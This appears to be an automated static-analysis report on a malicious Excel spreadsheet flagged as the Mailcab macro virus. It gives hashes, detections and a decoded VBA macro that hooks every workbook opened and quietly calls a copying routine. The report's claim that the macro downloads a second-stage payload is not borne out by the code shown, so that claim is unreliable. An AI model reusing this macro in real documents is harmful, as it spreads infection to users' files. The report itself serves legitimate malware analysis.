Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 8928bb6a0f182e3b…

MALICIOUS

Office (OLE)

126.0 KB
Created: 2009-06-23 15:09:09
Authoring application: Microsoft Excel
First seen: 2015-10-03
MD5: 7adcc2c5051d3a39db5a1a724d2951f0
SHA-1: 94a6cbf7a887bb580d43b4cfff9b2c8830a3044a
SHA-256: 8928bb6a0f182e3b80961e99500b105eda0b30f5543bf0dfd14f3444f9cdce3c
Risk Score: 128

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1566.001 Spearphishing Attachment

The file is an Excel spreadsheet containing a Workbook_Open VBA macro. This macro is designed to execute arbitrary code upon opening, indicated by the 'Shell' execution token in the heuristic firings. The macro's primary function appears to be downloading and executing a second-stage payload, although the specific download URL or execution command is not directly present in the provided script. The presence of a Workbook_Open macro and the execution of arbitrary code strongly suggest a malicious intent, likely delivered via spearphishing.

Heuristics 4

  • ClamAV: Xls.Virus.Mailcab-6702020-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Xls.Virus.Mailcab-6702020-0
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Workbook_Open macro low OLE_VBA_WBOPEN
    Workbook_Open macro
    Matched line in script
    Private Sub Workbook_open()

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 1120 bytes
SHA-256: 733eb43661d2ef0e54d7636555815dc20980ceef4c75866b2942458d446aaab2
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Public WithEvents xx As Application
Attribute xx.VB_VarHelpID = -1
Private Sub Workbook_open()
Set xx = Application
On Error Resume Next
Application.DisplayAlerts = False
Call do_what
End Sub
Private Sub xx_workbookOpen(ByVal wb As Workbook)
On Error Resume Next
wb.VBProject.References.AddFromGuid _
GUID:="{0002E157-0000-0000-C000-000000000046}", _
Major:=5, Minor:=3
Application.ScreenUpdating = False
Application.DisplayAlerts = False
copystart wb
Application.ScreenUpdating = True
End Sub


Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True